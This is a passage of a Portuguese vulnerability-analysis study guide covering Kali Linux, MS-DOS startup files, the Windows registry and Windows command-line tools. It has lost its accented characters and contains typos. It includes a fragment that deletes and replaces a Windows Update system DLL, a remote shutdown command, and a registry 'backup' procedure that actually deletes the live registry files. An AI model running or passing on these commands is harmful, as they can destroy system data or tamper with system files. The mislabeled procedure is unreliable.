Repositrios e pacotes com assinaturas GPG: Todos
os pacotes do Kali so assinados por cada desenvolvedor
individual quando eles so construdos e submetidos ao
repositrio, que em seguida assina os pacotes tambm.
Mltiplos idiomas: Embora as ferramentas usadas em
testes de intruso tendam a ser escritas em ingls, ns nos
asseguramos que o Kali possusse um suporte a idiomas real,
permitindo que mais usurios o operassem no seu idioma
nativo, e encontrasse as ferramentas de que precisa para realizar
suas tarefas.
Totalmente
customizvel:
Ns
entendemos
perfeitamente que nem todos iro concordar com nossas

www.clubedohacker.com.br

116

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
decises de design, ento tornamos o mais fcil possvel que
nossos usurios mais aventureiros customizem o Kali Linux ao
seu gosto, atravs de todo o sistema at mesmo o kernel.
Suporte ARMEL e ARMHF: J que os sistemas baseados
em processadores ARM esto se tornando mais e mais presentes e
baratos, sabamos que o suporte a processadores ARM no Kali
precisaria ser o to robusto quanto pudssemos gerenciar, o que
resultou em instaladores funcionais tanto para sistemas ARMEL
quanto para ARMHF.
O Kali Linux tem repositrios ARM integrados com a
distribuio principal, ento ferramentas para ARM sero
atualizadas em conjunto com o resto da distribuio. O Kali
atualmente est disponvel para os seguintes dispositivos ARM:
o
o
o
o

rk3306 mk/ss808
Raspberry Pi
ODROID U2/X2
Samsung Chromebook

Lembre-se: O Kali especialmente indicado para testes de intruso,


ento toda a documentao deste site pressupe um
conhecimento anterior do sistema operacional Linux.
Fonte: Copia na integras do site do Kali Linux http://www.kali.org/
acessado em 25/05/2013

www.clubedohacker.com.br

117

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Onde esto as ferramentas no Kali?

Ferramentas em modo grfico


Veja como ficou simples a utilizao das ferramentas do Kali

www.clubedohacker.com.br

118

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

No exemplo acima eu apenas digitei a palavra air e pressionei a


tecla tab e me foi mostrada toda sute de aplicativos air. Assim voc
no ir necessitar ficar entrando diretrio por diretrio em busca de
uma ferramenta ou outra, do prompt mesmo voc ir digitar o nome
da ferramenta. Voc poder encontrar elas em usr/share, conforme
demonstra a tela capturada e demonstrada abaixo.

www.clubedohacker.com.br

119

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Realmente no possvel negar o avano do Kali em relao ao


Backtrack, Mesmo o considerando excelente, mais o fato das
ferramentas terem sido recompiladas e as inovaes em relao aos
dispositivos Wireless torna o Kali muito superior ao Backtrack.

Um pouco de Windows
Comearemos esse capitulo conhecendo um pouco mais
sobre o funcionamento e controle dos sistemas da Microsoft desde o
MS-DOS

www.clubedohacker.com.br

120

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

At o registro do Windows, o gerenciamento de memria,


como montado o registro o concluiremos com o Microsoft
Windows PowerShell,

(Novo prompt de comando do Windows), muito mais


poderoso que o cmd.exe, voltado para automatizao, via scripts e
canalizao de objetos por uma sequncia de comandos para
manuteno de sistemas por administradores de sistemas. O Windows
PowerShell fornece acesso todas as APIs .NET disponveis no
sistema, alm dos objetos COM, e outras APIs Microsoft. O
Windows PowerShell integrado por padro ao Windows Server
2008 R2, Windows 7 e Windows 8, e tambm pode ser baixada
gratuitamente para instalao em outras verses do Windows em:
http://www.microsoft.com/en-us/download/details.aspx?id=2560

Config.sys
Nos inicio foi assim: Calma, no estou falando do inicio do
mundo, mais sim do inicio de uma grande revoluo que culminou no
estgio atual e em grandes avanos no que chamamos de sociedade
da informao, pois no ha como desassociar a informao da
industria de software, mais especificamente a Microsoft. (Discusses
ideolgicas a parte), Fundada em 1975 por Bill Gates e Paul Allen. O

www.clubedohacker.com.br

121

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
primeiro produto desenvolvido pela empresa foi uma verso do
interpretador BASIC, para o computador Altair 8800 e logo aps
Fortran, para os famosos computadores baseados em CP/M.
Bem, decisivamente esse trabalho no vai contar a histria da
Microsoft ou de qualquer outra companhia, citei aqui com a certeza
de que, mesmo no sendo desenvolvido por ela, o sistema
operacional MSDOS pode ser considerado como um dos pilares para
evoluo da informtica na dcada 80 e desde 1984, ano em que foi
lanada a primeira verso beta do Windows at nos dias atuais com o
Windows 8 ns temos discutido sobre os problemas e mais problemas
de instabilidade e falta de segurana nesses sistemas operacionais,
quando comparados com os sistemas GNU/Linux.
Vale ressaltar que grande parte de tais problemas ocorrem por
falta de conhecimento de quem os implementa e administra. Por ser
considerado um sistema fcil de instalar (No exigindo quase ou
nenhum conhecimento, pois ele particiona o disco e se instala quase
que sozinho, restando para o tcnico apenas alguns cliques de
mouse), mais vamos ao que interessa.
O Sistema Operacional MS-DOS possua um arquivo de
configurao no diretrio raiz, chamado Config.sys. Era a partir dele
que todo o sistema era configurado. A partir dos Windows 9x e
Windows NT, esse arquivo perdeu sua importncia, apesar de ainda
ser mantido para algumas tarefas especificas.
Voc pode estar se perguntando, o que tem a ver uma analise de
vulnerabilidades com esse sistema antigo e chatos?
Eu posso responder: Os comandinhos que formam a base de
conhecimento desse sistema j me tiraram de muitos apertos no
passado e, por incrvel que parea, mesmo nos dias de hoje. Mesmo
comandos, chamados mais modernos iro depender deles, pois nunca

www.clubedohacker.com.br

122

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
perdem sua validade e tem mais, no se surpreenda se eles voltarem
nos sistemas operacionais futuros.
Ento vamos aos fatos: Como o MS-DOS era um sistema
operacional extremamente rudimentar, ele por si s no reconhecia os
perifricos mais modernos da poca, tais como as modernas unidades
de cd-rom e placas de som, para que tais dispositivos funcionassem
corretamente era necessrio um pequeno roteiro que iria ensinar ao
sistema como ele deveria fazer para lidar com estes dispositivos. Esse
era o papel do driver, um pequeno programa carregado em memria
que "ensinava" ao sistema como trabalhar com um determinado
perifrico, No MS-DOS, os drivers eram carregados geralmente pelo
Config.sys atravs do comando DEVICE= ou DIVECEHIGH=.
Um dos grandes inconvenientes do MS-DOS era o fato de o
mesmo trabalhar com o processador em modo real, permitindo o
reconhecimento de apenas 640 KB de memria RAM.
Essa limitao era solucionada fazendo com que o driver fosse
carregado na rea de memria acima de 640 KB, chamada de
memria superior, assim a memria convencional no ficava
sobrecarregada. Isto era feito atravs do comando DEVICEHIGH=.
Alguns comandos MS-DOS
DEVICE=: Para carregar o controlador de dispositivo instvel
para a memria (um controlador de dispositivos instvel como um
programa que controla um componente de hardware).
DEVICEHIGH=: Para carregar um controlador de
dispositivos instvel na rea de memria superior.

www.clubedohacker.com.br

123

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
DOS=: Para especificar se o MS-DOS deve usar a rea de
memria alta (HMA) e se permite acesso a rea de memria superior
(UMB).
FILES=: Para especificar quantos arquivos pode ser abertos
ao mesmo tempo. Normalmente eu utilizava 200, mais dependendo o
tipo de hardware poderia variar.
INSTALL=: Para carregar um programa residente em
memria (TRS).
REM=: Para indicar que o seguinte texto um comentrio
descritivo, no um comando. Pode ser utilizado para desativar um
comando por exemplo.
SET=: Para definir o valor de variveis de ambiente, tal como
prompt ou temp.

Controladores de dispositivos instvel


Um controlador denominado instvel porque voc o instala
incluindo um comando no arquivo Config.sys por exemplo: O
COUNTRY.SYS: Para definir as convenes de idioma do pas ou os
comandos DISPLAY.SYS: Para aceitar mudana de pgina de
cdigos para monitores, EMM386.EXE: Para simular memria
expandida e permitir o acesso a rea de memria superior,
HIMEM.SYS: Para gerenciar o uso de memria estendida,
SETVER.EXE: Para carregar a tabela de verso do MS-DOS na
memria.
Um bom exemplo de configurao para que um micro PC
possa ficar no ponto ou se for o caso de um dia voc precisar criar um
CONFIG.SYS bsico para MS-DOS. Acredite, ainda temos softwares

www.clubedohacker.com.br

124

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
em clipper ou mesmo algumas configuraes de hardware que
necessitam disso.
No prompt de comando (cmd.exe) basta digitar edit
config.sys

ir aparecer a tela azul acima e nela voc deve incluir as linhas


abaixo.
device=c:\dos\himem.sys
device=c:\dos\e,,386.exe noems
dos=high,umb
stack=9,256
files=200
buffers=20
country=055,,c:\dos\country.sys
devicehigh=c:\dos\display.sys con=(,850)

www.clubedohacker.com.br

125

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
devicehigh-c:\windows\ifshlp.sys
Device=c:\windows\command\display.sys con=(ega,,1)
Country=055,850,c:\windows\command\country.sys

Autoexec.bat
O Autoexec.bat um arquivo em lote, isto significa que
qualquer comando vlido pode ser executado diretamente no prompt
de comando, ao contrrio do Config.sys, que possui comandos
prprios. Sua edio pode ser feita atravs do comando edit
c:\autoexec.bat da mesma forma que ocorre no Config.sys. Atravs
do dele podemos carregar drivers, fazer mapeamento de drivers e
impressora, unidades de disco em rede e at executar comandos e
programas residentes em memria. Acredite, ele no estaria ai sem
um propsito.

Tela do autoxec.bat

www.clubedohacker.com.br

126

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Principais comandos utilizados no autoexec.bat


PROMPT: Para definir o aspecto do aviso de comando.
PATH: Para especificar os diretrios e a ordem na qual o MSDOS pesquisa arquivos executveis (arquivos com extenso COM,
EXE, BAT).
ECHO OFF: Para instruir o MS-DOS a no exibir os
comandos do seu arquivo autoexec.bat a medida que so executados.
SET: Para criar uma varivel de ambiente que pode ser usada
por programas.
LOADHIGH: Para carregar os controladores de dispositivos
instvel para a rea de memria superior.
MODE: Para definir as caractersticas do seu teclado, monitor,
impressora e portas de comunicao.
Veja um exemplo de autoexec.bat
@ echo off
Set temp=c:\windows\temp
If exist c:\windows\temp\~*.* del c:\windows\temp\~*.*
Mode con codepage prepare=((850)
c:\windows\command\ega.cpi)
Mode con codepage select=850

www.clubedohacker.com.br

127

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Loadhigh= c:\windows\command\keyb.com br
Loadhigh=c:\windows\command\doskey.com
Path=c:\windows;c:\windows\command;c:\
Cls
Obs: a especificao de cada comando foi colocada em letras
maisculas para melhor fixao e no exemplo foi colocado o formato
correto como o fragmento abaixo que executa uma tarefa especifica
em relao wuauserv.dll.
net stop wuauserv
del %systemroot%\system32\wuauserv.dll
copy wuaus.dll %systemroot%\system32\wuauserv.dll
net start wuauserv

IO.SYS
Na poca em que o MS-DOS era utilizado como Sistema
Operacional, esse arquivo funcionava como um dos ncleos desse
sistema contendo o MS-DOS BIOS e o mdulo de inicializao, o
SYSINIT, que consistiam em devices drivers residentes (rotinas de
baixo nvel destinadas a controlar os dispositivos perifricos
suportados pelo computador) e um mdulo adicional de inicializao.
Com o advento do Windows 95, esse arquivo passou a ser o
prprio DOS 7.10, ou seja, o Sistema Operacional em modo Real de
16 bits, inserido no Windows 9x, executando funes bem diferentes
das anteriores.

www.clubedohacker.com.br

128

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Esse arquivo contm informaes necessrias para inicializar
o computador e carregar dispositivos do sistema que antes eram
carregados pelos arquivos Autoexec.bat e Config.sys.
Os drivers carregados como padro no IO.SYS incluem os
arquivos:
HIMEM.SYS
IFSHLP.SYS
SETVER.EXE
DBLSPACE.BIN ou DRVSPACE.BIN
A maioria das funes comuns desempenhadas pelas vrias
entradas nos arquivos Config.sys passaram a ser fornecidas por
padro no IO.SYS.

Parmetros do Config.sys incorporadas ao IO.SYS


Dos=High
Himem.sys
Ifshlp.sys
Setver.exe
Files=
Lastdrive=
Buffers=

www.clubedohacker.com.br

129

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Stacks=
Shell=command.com
Fcbs=

COMMAND.COM
Este arquivo o interpretador de comandos padro do MSDOS e demais sistemas da Microsoft, mesmo os mais modernos tem
um interpretador de comando. Este interpretador de comandos serve
de interface entre o usurio e o Sistema, sendo capaz de executar um
grupo de funes internas, tais como manipular arquivos ou
interpretar arquivos de processamento em lote (que fornecem uma
limitada linguagem de programao, til para escrevermos pequenos
programas compostos de uma sequencia de comandos do MS-DOS).
Este arquivo estava residente em dois diretrios sendo o
primeiro, no diretrio raiz, a falta desse arquivo neste diretrio, fazia
com que o sistema operacional no inicializasse, acusando a falta de
um interpretador de comandos. O segundo estava presente no
diretrio C:\Windows, a inexistncia desse arquivo neste diretrio
tambm fazia com que o sistema no conseguisse acessar o modo
DOS.

Como acessar o MS-DOS


Para acessar o DOS existiam, basicamente, 3 formas. Se voc estivesse
utilizando um sistema operacional antigo da Microsoft, como o
Windows 95 ou o Windows 98, bastava clicar em Iniciar / Desligar e

www.clubedohacker.com.br

130

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
escolher a opo Reiniciar o computador em modo MS-DOS (ou
equivalente). Outra forma nessas verses do Windows consistia em
clicar em Iniciar / Programas e selecionar Prompt do MS-DOS. Porm,
este ltimo procedimento acessava o DOS com o Windows ainda
carregado, o que significava que alguns comandos podiam no
funcionar. Mais se voc quisesse ir direto para o DOS sem passar pelo
Windows, bastava pressionar o boto F8 repetidas vezes logo aps ligar
a mquina e uma lista aparecer.
Se, no entanto, voc venha a utilizar um sistema operacional mais
recente, como o Windows XP, o Windows Vista ou o Windows 7, o
DOS em si no existe, mas sim um prompt que simula parcialmente suas
funcionalidades. Isso ocorre porque esses sistemas no so
"dependentes" do DOS como eram os Windows 95 e 98, por exemplo.
Isso significa que, nos sistemas operacionais atuais, alguns comandos do
MS-DOS podem simplesmente no funcionar.
Para acessar o prompt de comando no Windows XP, Vista ou o
Windows 7, basta digitar o comando CMD em Iniciar / Executar.

www.clubedohacker.com.br

131

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O que o registro no Windows?
De acordo com a Microsoft, o Registro do Windows de 32
bits ( Windows 9x e Windows NT ) um banco de dados hierrquico
que centraliza e armazena todas as configuraes de hardware e
software do computador.
Banco de dados porque sua funo primordial o
armazenamento de dados de configurao chamados valores.
Hierrquico, porque como voc ter a oportunidade de examinar, a
estrutura do Registro semelhante estrutura hierrquica de uma
rvore de diretrios e subdiretrios, o que confunde muitos usurios
desavisados que imaginam que as chaves de Registro so realmente
pastas ocultas do Windows existentes no disco.

Origens do registro
O primeiro esboo do Registro surgiu no Windows 3.1 com o
arquivo Reg.dat. Na poca era um tanto limitado, servindo
exclusivamente para guardar informaes sobre associaes de
arquivos (que permitiam que o comando associar do gerador de
arquivos do Windows 3.1 funcionasse ) e tambm informasse sobre
OLE ( Object linking and Embedding ) usadas pelos aplicativos
clientes ou servidores OLE.
A Microsoft afirma que embora no seja possvel perceber
nenhuma diferena significativa na estrutura do Registro em relao
as verses de seus sistemas, desde o Windows 9X at o Windows 7, o
cdigo que o implementa, sempre otimizado (em nvel binrio), de
modo a aumentar a velocidade do seu processamento a cada nova
verso.

www.clubedohacker.com.br

132

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Arquivos do registro no Windows


Windows armazena o contedo do Registro em dois arquivos
chamados SYSTEM.DAT e USER.DAT. O primeiro armazena as
chaves e sub-chaves relativas configurao do hardware e do
software. O segundo guarda as configuraes especficas dos
usurios.
Uma vez que o Windows esteja funcionando perfeitamente
bem, aconselhvel criar uma cpia manual dos arquivos do registro.
Para isso necessrio desativar os atributos hidden e system de
USER.DAT e SYSTEM.DAT. Utilizamos, para isso, o utilitrio
ATTRIB.EXE existente na pasta COMMAND que sempre existe
dentro do diretrio do Windows.
Como \%WINDIR%\COMMAND est referenciado no path
do Windows, podemos utilizar os comandos abaixo:
attrib c:\windows\*.da? -h -r -s -a
del c:\windows\*.dat
ren c:\windows\*.da? *.dat
attrib c:\windows\*.dat +h +r +s +a
Agora possvel usar o comando COPY para copiar ambos os
arquivos para um local seguro.

www.clubedohacker.com.br

133

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Navegando pelo registro


Se voc consegue "navegar" pelo Windows Explorer no
sentir nenhuma dificuldade em navegar pelo Editor de Registro.
O Registro formado por 6 chaves bsicas (listamos na ordem
em que aparecem no Editor de Registro):
HKEY_CLASSES_ROOT
KEY_CURRENT_USER
KEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
Em cada chave armazenado um tipo diferente de
informao. Iremos ver como funciona cada chave e qual o tipo de
informao h armazenada.
Sempre que possvel iremos apresentar dicas que sejam
vlidas para todos os micros.
muito importante notar que no h como fazermos um
roteiro vlido para todos os micros, pois em cada micro o Registro
ser um pouco diferente, j que os programas e perifricos instalados
varia de micro para micro, mas vamos apresentar para voc a maioria
dos sistemas operacionais da Microsoft, desde o Windows 9X at o
Windows 7.

www.clubedohacker.com.br

134

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
HKEY_LOCAL_MACHINE
Essa uma das chaves mais importante do Registro. nela
que esto armazenadas informaes a respeito dos perifricos e
programas instalados no micro, incluindo a configurao do prprio
Windows. Fisicamente falando, as informaes dessa chave esto
armazenadas no arquivo System.dat. Essa chave possui as seguintes
sub-chaves.
Config: Armazena configuraes para os Perfis de Hardware
instalados no micro. Na maioria das vezes temos somente um perfil
de hardware instalado e, da, essa chave normalmente apresenta
somente uma subchave, 0001 - que contm informaes sobre esse
nico perfil. Caso voc crie novos perfis de hardware (o que pode ser
feito atravs da guia Perfis de Hardware do cone Sistema do Painel
de Controle) novas chaves sero criadas.
Enum: Informaes sobre o hardware do micro.
hardware: Informaes sobre portas seriais e modems
utilizados pelo programa HyperTerminal.
Network: Informaes criadas quando um usurio se conecta
a um micro conectado em rede. Armazena informaes como nome
do usurio, logon, tipo de servidor, etc.
Security: Informaes sobre a segurana da rede e
administrao remota.
Software: Informaes e configuraes de programas
instalados no micro. Nessa chave as informaes so armazenadas no
padro fabricante/programa/verso /configuraes.
System: Essa chave comanda o carregamento de drivers
durante o boot e demais configuraes do sistema operacional. A
subchave Control contm informaes utilizadas durante o

www.clubedohacker.com.br

135

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
carregamento do sistema operacional, enquanto a subchave Services
contm informaes sobre o carregamento de drivers de dispositivo.
HKEY_USERS
O Windows permite que mais de um usurio utilize um
mesmo micro, cada um com suas configuraes particulares, tais
como proteo de tela, papel de fundo, atalhos presentes na rea de
trabalho, etc. A escolha do usurio feita no logon do Windows,
quando o sistema pede o nome do usurio e sua senha. Essa chave
armazena as configuraes do sistema para cada usurio e
fisicamente est armazenada no arquivo User.dat.
Quando o sistema est configurado para o acesso por apenas
um usurio, a chave HKEY_USER contm apenas uma subchave,
.default, contendo todas as configuraes pessoais do sistema
(proteo de tela, papel de parede, etc).
No caso de haver mais de um usurio configurado no sistema,
quando ele faz logon no sistema, essa chave conter suas
configuraes pessoais. Por exemplo, no caso de haver um usurio
chamado Adonel, existir uma chave chamada "Adonel" quando esse
usurio entrar no sistema. A chave .default continuar existindo,
contendo as configuraes padro do sistema.
Se no mesmo micro existir um outro usurio chamado Maria,
a chave "Maria" s existir quando o prprio usurio fizer logon no
sistema, de forma que um usurio no consiga ver nem alterar
configuraes de outro usurio (ou seja, o usurio Maria no
conseguir ver as configuraes do Adonel e vice-e-versa).
HKEY_CURRENT_USER
Essa chave um atalho para a chave do usurio que fez logon
no sistema. Ou seja, se o usurio "Adonel" foi quem fez logon no

www.clubedohacker.com.br

136

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
sistema, essa chave apontar para a chave HKEY_USERS\Adonel.
Portanto, fisicamente essa chave no existe, pois apenas aponta para
outra parte do registro.
HKEY_CLASSES_ROOT
Essa chave um atalho para a chave
HKEY_LOCAL_MACHINE\SOFTWARE\Classes. Essa chave
existe para manter compatibilidade com programas antigos.

HKEY_CURRENT_CONFIG
Essa chave tambm um atalho (ou seja, no existe
fisicamente, apenas aponta para outra rea do registro), desta vez para
HKEY_LOCAL_MACHINE\Config\xx, onde xx o perfil de
hardware que est atualmente configurado. Como na maioria dos
micros s h um nico perfil de hardware configurado, normalmente
essa chave aponta para HKEY_LOCAL_MACHINE\Config\0001.
Voc pode saber qual o perfil de hardware que est sendo
atualmente utilizado no sistema lendo o valor presente em
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Con
figDB.
HKEY_DYN_DATA
Todas as configuraes armazenadas nas chaves anteriores
so estticas, ou seja, so armazenadas em algum lugar do disco
rgido (em geral nos arquivos System.dat e User.dat). A chave
HKEY_DYN_DATA contm informaes dinmicas e que existem
somente na sesso atual.
Essas informaes so lidas durante o boot da mquina e
contm informaes como a lista de dispositivos Plug and Play

www.clubedohacker.com.br

137

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
instalados no micro (essas informaes so armazenadas na subchave
Config Manager\Enum). Essas informaes ficam armazenadas em
memria RAM e, portanto, so criadas a cada boot da mquina.

O Registro nas verses de 64 bits do Windows,


O Registro nas verses de 64 bits do Windows XP e do Windows Server
2003, 7 est dividido em chaves de 32 bits e 64 bits. Mas se
compararmos em sua estrutura no encontraremos diferenas
significativas.

Muitas das chaves de 32 bits tm os mesmos nomes de suas


correspondentes de 64 bits e vice-versa.
A verso padro de 64 bits do Editor do Registro inclusa nas verses de
64 bits do Windows XP, do Windows Server 2003 e7 exibe as chaves
de 32 bits em HKEY_LOCAL_MACHINE\Software\WOW6432.
O suporte de 32 e de 64 bits coexiste dentro da chave WOW64
(HKEY_LOCAL_MACHINE\Software\WOW6432Node)
HKEY_CLASSES_ROOT, HKEY_LOCAL_MACHINE\Software

www.clubedohacker.com.br

138

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O item WOW64 do registro, est relacionado com:
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\COM3
HKEY_LOCAL_MACHINE\Software\Ole
HKEY_LOCAL_MACHINE\Software\EventSystem
HKEY_LOCAL_MACHINE\Software\RPC

Ferramentas para edio do registro


Existem ferramentas muito legais para manipulao do
registro do Windows. Atravs dessas ferramentas voc pode
visualizar as linhas de registro que esto sendo utilizadas pelos
programas em execuo, os servios do sistema as DLLs, pode
limpar o registro manualmente, mais o que considero mais importante
o fato de podermos estudar o registro com mais tranquilidade,
devido sua interface amigvel, (Lembre-se, tudo que est rodando no
sistema importante).

www.clubedohacker.com.br

139

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Alguns comandos para execuo de tarefas via prompt cmd.exe


appwiz.cpl (O mesmo que adicionar ou remover programas e
componentes do Windows )
arp (Exibe, adiciona e remove informaes arp de dispositivos de
rede)
assoc (O comando assoc exibe a associao de arquivo para cada um
dos diferentes extenses de arquivo no computador)
attrib (O comando attrib permite ao usurio alterar as propriedades do
arquivo)
bootcfg.exe (O comando bootcfg um comando do Console de
recuperao que permite ao usurio reconstruir, ver, e fazer alteraes
no arquivo Boot.ini)
cacls.exe (Substituido por icacls.exe permite a visualizao e
modificaes nas ACLs de um arquivo)

www.clubedohacker.com.br

140

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
chcp.exe - (Exibe a pgina de cdigo ativa)

cd e chdir (Meios para se movimentar entre os diretrios no MS.DOS)


cipher.exe (Exibe ou altera a criptografia de diretrios [arquivos] em
partio NTFS)
convert (Converte FAT para NTFS ex: / FS: NTFS Especifica os
volumes a serem convertidos que para NTFS.
compmgmt.msc (Abre o gerenciador do computador, configuraes
do sistema, componentes etc.)
cmd (Abre a janela do prompt de comando)
control.exe (Abre o painel de controle do Windows)
defrag ( Desfragmenta o o disco especificado)
deltree (Comando usado para apagar arquivos e diretrios do
computador permanentemente)
dir (O comando dir permite que voc veja os arquivos disponveis no
diretrio corrente ou em qualquer outro diretrio)
diskcopy (O permite fazer cpia completa de um disco para outro)
diskpart (O comando diskpart uma console de recuperao que
permite ao usurio excluir e criar parties em seu PC)

www.clubedohacker.com.br

141

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
doskey (Permite ao usurio manter um histrico de comandos usados
no computador)
driverquery (Permite a exibio e administrao dos de drivers de
dispositivo instalados
endlocal (Interrompe a localizao das alteraes de ambiente
habilitado pelo comando setlocal)
eventvwr.exe (Abre a visualizao de eventos do sistema)
findstr (Utilize para localizar arquivos especficos contendo uma
determinada sequncia de texto simples)
fsutil (Utilitrio de linha de comando que pode ser usado para executar
vrias tarefas relacionadas com a tabela de alocao de arquivos (FAT) e
sistemas de arquivos NTFS)
ftype (Exibe e modifica tipos de arquivos)
getmac (Ativa a ferramenta de administrao para exibir o endereo
MAC dos adaptadores de rede no sistema)

gpedit.msc. (Chama o editor de poltica de grupo local e permite ajustar


polticas que afetam a mquina local)
gpupdate (Atualiza as diretivas da poltica de grupos)

www.clubedohacker.com.br

142

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
hostname (Mostrar o nome da mquina) I
inetcpl.cpl (Exibe o Internet Explorer e permite adequao nas
configuraes)
ipconfig.exe (Mostra as configuraes e endereo de rede)
lodctr (Atualiza valores de registro)
logoff (Permite fazer logof de um usurio pela linha de comando, seja
local ou remoto)
Logman (Gerencia e agenda contador de desempenho logs de eventos,
rastreamento em sistemas locais e remotos)
md ou mkdir (Permite criao de diretrios no MS-DOS)
mountvol (Cria, exclui ou lista um volumes e pontos de montagem)
msinfo32.exe (Exibe informaes sobre hardware e configuraes
avanadas de software)
msra.exe (Abre a assistncia remota para oferecer ou pedir ajuda a um
amigo atravs da internet)
netsh (Permite a realizao de alteraes nas configuraes de seu
dispositivo de rede tais como a mudana de um endereo dinmico para
um endereo esttico ou alterar o endereo IP)
netstat (Exibe o protocolo TCP/IP, estatsticas e informaes sobre as
conexes)
nslookup (Permite a procura de um endereo IP de um determinado
domnio ou host em uma rede e faz consulta reversa)

www.clubedohacker.com.br

143

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
pathping ( semelhante ao tracert quando mapeia determinada rota de
um pacote entre a origem e destino e tem a capacidade de localizar
pontos com latncia de rede e perda de pacotes)
perfmon.exe (Abre o monitor de desempenho em computadores locais
ou remotos)
popd (Muda para o caminho do diretrio ou da rede armazenada pelo
comando pushd)
rd / rmdir (Remove diretrios vazios no MS-DOS)
regedit.exe - (Abre o editor do registro do Windows)
rstrui.exe - (Abre a restaurao do sistema)
runas (Permite a execuo de programas em um computador remoto)
secedit (Configura e analisa a segurana do sistema)
taskmgr.exe (Abre o gerenciador de processos)
taskkill (Usado para matar processos a partir do prompt do MS-DOS)
tasklist (Esta a lista de processos em execuo em cada mquina local
ou remoto)
waitfor (Sincroniza vrios computadores em uma rede)
whoami (Retorna nome de domnio, nome do computador, nome de
usurio logado)
wscui.cpl (Exibe a tela de configuraes de segurana)

www.clubedohacker.com.br

144

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
xcopy (Comando de cpia com recursos adicionais)
at (Planeja a execuo de comandos e programas em um
computador, em uma data e hora especificadas)

Comandos de rede no Windows


*Desligar pela Rede
shutdown -s /C /Y /T:30 "msg" \\Estao
Opes:
"-s" = Ordena o desligamento do sistema
"/C" = Fechar os programas em aberto
"/T:xx" = Estabelece um tempo para desligar o sistema
"/Y" = Ordena que seja salvo os documentos em edio antes de desligar
""msg"" = Uma mensagem para a rede
"\\Estao" = Nome do computador que ser desligado

*Mapear Unidade Pela Rede


NET USE Z: \\SERVIDOR\DISCO_C
Opes:
Z: - a unidade que se deseja mapear
\\Servidor\ - Computador hospedeiro

www.clubedohacker.com.br

145

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Disco_C - Refere-se ao compartilhamento que se deseja
mapear

Comando teis para serem executados via executar

Windows + R. Ir exibir a janela executar

Citarei abaixo apenas o comando e o programa a que o mesmo se


refere e no exatamente todas as suas funcionalidades, apenas em
alguns casos que eu considere de maior relevncia para nosso
propsito nessa obra.
APPWIZ.CPL : O mesmo que adicionar remover programas no
painel de controle;

www.clubedohacker.com.br

146

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

AZMAN.MSC : Gerenciador de autorizaes

www.clubedohacker.com.br

147

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
CERTMGR.MSC : Certificados para o usurio atual

CLICONFG : Configurao dos clientes SQL

www.clubedohacker.com.br

148

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

COLLAB.CPL : Minha vizinhana imediata

www.clubedohacker.com.br

149

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

COMEXP.MSC : Servios e componente, Idem para


DCOMCNFG

www.clubedohacker.com.br

150

ADONEL BEZERRA
